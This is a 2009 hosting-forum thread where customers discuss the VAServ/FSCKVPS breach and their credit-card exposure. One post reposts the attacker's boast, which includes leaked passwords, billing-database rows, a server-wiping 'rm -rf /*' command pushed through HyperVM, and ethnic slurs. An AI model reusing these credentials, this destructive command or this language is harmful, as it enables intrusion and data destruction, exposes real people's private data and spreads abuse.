Results 1 to 25 of 54
-
06-09-2009, 08:16 AM #1New Member
- Join Date
- Jun 2009
- Posts
- 1
vaserv/fsckvps client base compromised?
i know that hacker claimed that he got the vaserv/fsckvps client database? Should we cancel our credit cards? this is a major issue and someone should he held responsible!
-
06-09-2009, 08:21 AM #2Junior Guru Wannabe
- Join Date
- Aug 2007
- Posts
- 97
I changed my paypal password (all i've ever used with them.)
-
06-09-2009, 09:36 AM #3Newbie
- Join Date
- Jun 2009
- Posts
- 5
-
06-09-2009, 11:42 AM #4Web Hosting Master
- Join Date
- Mar 2009
- Location
- Minnesota
- Posts
- 700
If fsck vps was PCI compliant, they shouldn't have gotten any sort of CC information/paypal information.
█ madgenius.com - S Corp. We are US based company.
█ Web Hosting, Cloud VPS, and Dedicated Solutions since 1998
█ Also offering custom solutions and automated provisioning for most services
-
06-09-2009, 11:47 AM #5Junior Guru Wannabe
- Join Date
- Apr 2009
- Posts
- 60
-
06-09-2009, 11:52 AM #6Web Hosting Master
- Join Date
- Oct 2007
- Location
- United States
- Posts
- 1,182
If he got the database and then the config file (WHMCS config which contains the hash key) from the web server, then that means he has the encryption key to view the credit cards. This of course is an assumption that they are using WHMCS.
Before you make such claims that their whmcs was compromised, you should make sure to know the facts first.www.opticip.com - Optic IP LLC
-
06-09-2009, 12:03 PM #7Virtually Flawless ;)
- Join Date
- Apr 2009
- Location
- USA / UK
- Posts
- 4,577
It looks like a transcript of the hackers message is here:
http://www.tjphippen.com/hackerpost.txt
Edit: the hackers message is gone now, so here's the full text:
Code:Z3r0 day in hypervm?? plz u give us too much credit. If you really really wanna know how you got wtfpwned bitch it was ur own stupidity and excessive passwd reuse. Rus's passwds are Code: e2x2%sin0ei unf1shf4rt 3^%3df 1/2=%mod5 f0ster f0ster being the latest one, quite secure eh bitches? We were in ur networks sniffing ur passwds for the past two months quite funny this openvz crap is we could just get into any VPS we like at any time thanks to ur mad passwds. But we got bored so we decided to initiate operation rmfication and hypervm was a great t00l to do that since it spared us the time of sshing into all ur 200 boxen just to issue rm -rf. Coded a little .pl to do just that, take a look at this eleet output it's mad dawg Code: [root@vz-vaserv .ssh]# perl h.pl -user admin -pass ****off -host cp.vaserv.com -cmd 'rm -rf /* 2> /dev/null > /dev/null &' [+] Attempting to login using admin / ****off [+] Logged in, showtime! Output for 67.222.156.106 Output for xen3ws.vaserv.com Output for vz22uk.vaserv.com Output for xen4ws.vaserv.com Output for vzspecial5.vaserv.com Output for xen16.vaserv.com Output for vz77uk.vaserv.com Output for 91.186.26.128 Output for xen25.vaserv.com Output for vz76uk.vaserv.com Output for vz18tx.vaserv.com Output for vz75uk.vaserv.com Output for vz45uk.vaserv.com Output for vzpent16.vaserv.com Output for xen1tx.vaserv.com Output for vz13tx.vaserv.com Output for vz74uk.vaserv.com Output for vzspecial8.vaserv.com Output for xen24.vaserv.com Output for vz73uk.vaserv.com Output for rdns1.vaserv.com Output for vz2tx.vaserv.com Output for vz17tx.vaserv.com Output for xen23.vaserv.com Output for vz72uk.vaserv.com Output for xen22.vaserv.com Output for vzruffbuff.vaserv.com Output for vzmario.vaserv.com Output for xen21.vaserv.com Output for vz71uk.vaserv.com Output for vzspecial7.vaserv.com Output for vz70uk.vaserv.com Output for xen20.vaserv.com Output for vz69uk.vaserv.com Output for vzspecial6.vaserv.com Output for vz7uk.vaserv.com Output for vzspecial4.vaserv.com Output for vzspecial3.vaserv.com Output for xen19.vaserv.com Output for vzspecial2.vaserv.com Output for vzspecial1.vaserv.com Output for vzpent3.vaserv.com output truncated due to massive boxen outputz [root@vz-vaserv .ssh]# rm -rf /* > /dev/null 2> /dev/null & [1] 12399 [root@vz-vaserv .ssh]# Did the same fo ****vps.com after resetting the passwd to hyper ve emz, it was ever so much fun you should try it sometime Rus it's GREAT! BTW to all the customers we deleted ur loving provider is overselling their crappy 8gb nodez to hell and back, thought you'd like to know, you can also thank ur loving buddy Rus for losing ur data hihi. BTW Rus we still have ur billing system wtfpwned and baqdoored we got shitload of CCz from ur retarded customers thanks a lot buddy. Telling you this cuz we got bored of this ****, it's just too easy and monotonous so patch ur crap, if your too dumb to secure a simple web server my rate is $100/hour or one night with ur sister hauhaiahiaha. Also wheres ur team Rus? the only ****ers i saw in ur billing sys are Kody, Vlada and u you guys work like ****ing hindus i bet but ur cheap like jews lolz hire some pros like me to help you out manage all those retards VPSs lolololl Code: 1 1 rghf c32f3310baffcb431875a67196e99ebd Rus F zswlxxoomx@nowmymail.com 0 , Edit Delete 3 1 vlada c32f3310baffcb431875a67196e99ebd Vlada Neskovic zswlxxoomx@nowmymail.com 0 , Edit Delete 4 1 Kody fde67637d867c52d739931528dd92ef0 Kody Riker zswlxxoomx@nowmymail.com Georgia - server22 space 1slot 1gb 0 , See we care about ur privacy and edited ur emailz unlike you who do not care about the privacy of ur retarded customers lol Code: Showing rows 0 - 29 (1,361 total, Query took 0.0133 sec) SELECT * FROM `tblclients` LIMIT 0 , 30 Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus. Yea yea "his IP is:64.79.210.78" here i saved u the trouble lolol Code: -bash-3.2# ifconfig lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:16271 errors:0 dropped:0 overruns:0 frame:0 TX packets:16271 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1114930 (1.0 MiB) TX bytes:1114930 (1.0 MiB) venet0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:127.0.0.1 P-t-P:127.0.0.1 Bcast:0.0.0.0 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 RX packets:33396 errors:0 dropped:0 overruns:0 frame:0 TX packets:34122 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:4462516 (4.2 MiB) TX bytes:11170841 (10.6 MiB) venet0:0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:64.79.210.78 P-t-P:64.79.210.78 Bcast:64.79.210.78 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 venet0:1 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:64.79.206.197 P-t-P:64.79.206.197 Bcast:64.79.206.197 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 venet0:2 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:67.223.225.52 P-t-P:67.223.225.52 Bcast:67.223.225.52 Mask:255.255.255.255 UP BROADCAST POINTOPOINT RUNNING NOARP MTU:1500 Metric:1 -bash-3.2# rm -rf /* 2> /dev/null > /dev/null * & [1] 7643 -bash-3.2# I love to rm lol bye ~Thedefaced.org
→ RAM Host -- USA Premium & Budget Linux Hosting
█ Featuring Powerful cPanel Shared Hosting
█ & Premium Virtual Dedicated Servers
→ Follow us on Twitter
-
06-09-2009, 12:04 PM #8WHT Addict
- Join Date
- Jun 2006
- Posts
- 148
They can't have got your paypal password because as with all companies, vaserv direct you to paypal.com to log in - the password is never stored anywhere other than paypal and anyone that enters their paypal login info anywhere other than paypal.com is stupid.
-
06-09-2009, 12:05 PM #9Mr. Awesome
- Join Date
- Jul 2002
- Posts
- 6,347
Their cheapvps.co.uk brand is using Ubersmith.
If their database was compromised, I suspect Rus will let us know asap. He has been very open and honest about everything so far, so I have confidence he will let us know if their database of credit card details was stolen.
That being said... it is always a good idea to periodically change your passwords, so now might be as good a time as any.
Also maybe give your credit card company a call and ask them to temporarily suspend the card for a few days until Rus has a chance to confirm if their database was stolen or not. It can't hurt to be overly cautious, but I would not actually cancel your card just yet.
We are eNom PLATINUM PLUS resellers!
Sign up today for an eNom.com reseller account with lowest possible pricing.
* We provide support and service to over 4275 happy eNom domain name and SSL certificate resellers!
-
06-09-2009, 12:10 PM #10Web Hosting Master
- Join Date
- Oct 2007
- Location
- United States
- Posts
- 1,182
Fun stuff think we gonna sell all those emails to some spammers to make some quick bucks lol, and yes their main site was a VPS lolol which is why we got quick access thanks to ur passwd reuse, your awesome Rus.www.opticip.com - Optic IP LLC
-
06-09-2009, 12:17 PM #11Newbie
- Join Date
- Aug 2006
- Posts
- 7
Can we stop talking about this here... this thread is surely about people getting sorted out.
Not discussing what _could_ be complete BS from someone trying to look good by posting some code up.Last edited by anon-e-mouse; 06-14-2009 at 05:24 PM. Reason: removed size tags
-
06-09-2009, 12:25 PM #12New Member
- Join Date
- Jun 2009
- Location
- Austria
- Posts
- 2
Maybe its BS, maybe not.
But if its true, credit card user are in danger of misuse.
If it's true that "BTW Rus we still have ur billing system wtfpwned and baqdoored" then future use of this system isn't really recommendable.
-
06-09-2009, 12:25 PM #13Virtually Flawless ;)
- Join Date
- Apr 2009
- Location
- USA / UK
- Posts
- 4,577
(sized reduced)
This is a discussion - i ripped that from the source as described, which i aquired while listening to an irc channel.
and i have a bigger reputation than you and have no reason to argue with someone who only has 7 posts - I suspect a mod will be round to take care of you soon.
Besides, you can find the same text here in the really big thread.
It also exists here
This forum exists to discuss things, and when new information arises you shouldn't be so quick to jump to conclusions.
i've been breaking news all night
take it easy - nobody is after you personally.Last edited by ramnet; 06-09-2009 at 12:32 PM.
→ RAM Host -- USA Premium & Budget Linux Hosting
█ Featuring Powerful cPanel Shared Hosting
█ & Premium Virtual Dedicated Servers
→ Follow us on Twitter
-
06-09-2009, 01:05 PM #14Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
I think it may be bs but if his password was actualy f0ster after his last name thats just stupid.
and we are all fully aware they oversell but aslong as i sitll get quality i dont careLeader of the new anti sig spamming club.
-
06-09-2009, 01:10 PM #15WHT Addict
- Join Date
- Mar 2006
- Posts
- 134
-
06-09-2009, 01:12 PM #16Web Hosting Master
- Join Date
- Jan 2004
- Location
- South East U.K.
- Posts
- 1,303
Just got this from FSCKVPS
Dear Clients,
As you are most aware of the recent incidents, we are aware the the hackers may have got a hand on the credit card details of your account. While this information is encrypted, and is believed to be safe, we are sending out this notification to let you know that they might have the infromation and that you should take proper precautions.
a). Cancel Credit cards
b). Watch Bank Statements
c). Keep updated with the status on http://fsckvps.com.
We appreciate each customers patience and co-operation in this time. We ask that you do not respond to this email as it will bulk up our support department even more.
-
06-09-2009, 01:13 PM #17Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
-
06-09-2009, 01:15 PM #18WHT Addict
- Join Date
- Mar 2006
- Posts
- 134
-
06-09-2009, 01:17 PM #19Newbie
- Join Date
- Jun 2007
- Posts
- 12
If you are worried about your paypal (used the same password or whatever) you can always set your cellphone up as a security token (they have to text you a code to allow you to log in).
Edit: I also just realized that it doesn't appear that they store your PayPal email address (Check and old invoice and all it said was paid by paypal. I know it's stored in their transaction log in paypal but I'm not sure about on the website). So if you have a different email you use with paypal you should also be pretty safe.Last edited by spyfox5400; 06-09-2009 at 01:21 PM.
-
06-09-2009, 01:24 PM #20Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
-
06-09-2009, 01:28 PM #21Web Hosting Guru
- Join Date
- Mar 2004
- Location
- /dev/null
- Posts
- 275
Yep, just received:
Dear Clients,
As you are most aware of the recent incidents, we are aware the the hackers may have got a hand on the credit card details of your account. While this information is encrypted, and is believed to be safe, we are sending out this notification to let you know that they might have the infromation and that you should take proper precautions.
a). Cancel Credit cards
b). Watch Bank Statements
c). Keep updated with the status on http://fsckvps.com.
We appreciate each customers patience and co-operation in this time. We ask that you do not respond to this email as it will bulk up our support department even more.
If you have any questions about this specifically, please wait 48 hours and then reply to billing@fsckvps.com
Regards,
FsckVPS Billing.
Hmm, sorry for the double post, but I forgot to refresh the page after lunch ...
-
06-09-2009, 01:32 PM #22Web Hosting Master
- Join Date
- Oct 2008
- Posts
- 2,253
-
06-09-2009, 01:39 PM #23Newbie
- Join Date
- Jun 2007
- Posts
- 12
-
06-09-2009, 02:06 PM #24Web Hosting Master
- Join Date
- Nov 2001
- Location
- Vancouver
- Posts
- 2,422
Log on to https://secure.fsckvps.com/ and check "My Emails".
“Even those who arrange and design shrubberies are under
considerable economic stress at this period in history.”
-
06-09-2009, 02:09 PM #25Newbie
- Join Date
- Jun 2007
- Posts
- 12